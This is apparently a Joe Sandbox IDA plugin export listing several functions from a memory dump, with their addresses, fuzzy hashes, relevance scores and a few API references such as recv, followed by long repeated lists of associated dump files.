Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_file.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: e81a70a50d8f95ca94098167a0561123b15296d981f9a5a940e6dd398b255734
Instruction ID: ba7e91e533d750c0c2e0c4dd363984f36dfb7fda1db123da860c92250ddab7ee
Opcode Fuzzy Hash: e81a70a50d8f95ca94098167a0561123b15296d981f9a5a940e6dd398b255734
Instruction Fuzzy Hash: D3C22C71E046288FDB25CE28DD807EAB7F5EB45705F1441EAD84DE7240EB79AE858F40

Function 00B2E0C0 Relevance: 4.6, APIs: 3, Instructions: 102networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,00000004,00000000), ref: 00B2E10B
recv.WS2_32(?,?,00000008,00000000), ref: 00B2E140

Memory Dump Source

Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_file.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: cc2a9068c539b356f555331e8b068de54e6fdf46d727e40552c128d05cee9b0b
Instruction ID: 7383ae1815cb1d9ea7b381cb9bc5794c20786138624d83d8a11d9b9f4356c09a
Opcode Fuzzy Hash: cc2a9068c539b356f555331e8b068de54e6fdf46d727e40552c128d05cee9b0b
Instruction Fuzzy Hash: E931E771A002589BD720CB69DC81BEF7BFCEB08724F540665E529E73A1CA74E844CBA0

Function 00B62D10 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
Instruction ID: 1a4b688cf352647268df44c79ff9d348d51aa369f54beb3faa6f3815497f17f6
Opcode Fuzzy Hash: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
Instruction Fuzzy Hash: 1FF14D71E002199FDF14CFA8C8806ADB7F1FF49714F2582A9E919AB344D735AE45CB90

Function 00B3CBEA Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,00B3CF52,?,00000003,00000003,?,00B3CF87,?,?,?,00000003,00000003,?,00B3C4FD,00B22FB9,00000001), ref: 00B3CC03

Memory Dump Source

Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_file.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: c36442663a67341754c9c11fbb6af41c6378a231cb2984256a6aa217926b6f61
Instruction ID: cd40d023b6c012269c4f18f47368f4310d6e3a9edf5ca69af72f62f1573a84ab
Opcode Fuzzy Hash: c36442663a67341754c9c11fbb6af41c6378a231cb2984256a6aa217926b6f61
Instruction Fuzzy Hash: 55D02232542038D38A553BC4EC008AEBFD8DA00B147001062EA0D23120CE20AC409BE1

Function 00B57F36 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 00B580B2

Memory Dump Source

Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: 213cbcf92d724f8cf4c536503e0748a26bdf48d7ff18fb0bafe041126b2e3190
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: C6516B703487845ADB38DA2898D57BE67DADF11307F1805E9EC82F72D1CE529D4E8351

Function 00B24DE0 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d11a570ba1c88e6ae02861ed1b3166d9fd0440eec14b57916c6e4e95cc8d9d0
Instruction ID: ad381f989ff47cb13208c824853fae2cc764e58880bd7efd3044050a073bdbba
Opcode Fuzzy Hash: 4d11a570ba1c88e6ae02861ed1b3166d9fd0440eec14b57916c6e4e95cc8d9d0
Instruction Fuzzy Hash: 072250B3F515144BDB4CCB9DDCA27EDB2E3AFD8218B0E803DA40AE3345EA79D9158644

Function 00B67049 Relevance: .3, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
